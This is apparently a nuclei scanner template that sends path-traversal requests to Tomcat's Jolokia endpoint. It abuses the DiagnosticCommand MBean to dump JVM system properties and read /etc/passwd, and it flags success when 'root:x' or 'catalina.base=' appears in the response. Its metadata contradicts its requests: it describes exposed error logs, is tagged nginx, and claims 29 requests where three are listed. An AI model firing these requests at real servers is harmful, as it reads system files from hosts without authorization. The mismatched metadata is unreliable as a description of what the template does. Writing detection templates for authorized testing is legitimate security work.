id: alias_tomcat_jokolia

info:
  name: xand
  author: Redflare-Cyber_
  severity: medium
  description: Error log files were exposed, enhanced from official nuclei templates with added paths and matchers.
  metadata:
    max-request: 29
    shodan-query: html:"error.log"
  tags: nginx

http:
  - method: GET
    path:

      - "{{BaseURL}}/%5c../jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties"
      - "{{BaseURL}}/..;/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/%5c../jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'root:x'
          - 'catalina.base='

        condition: or

      - type: status
        status:
          - 200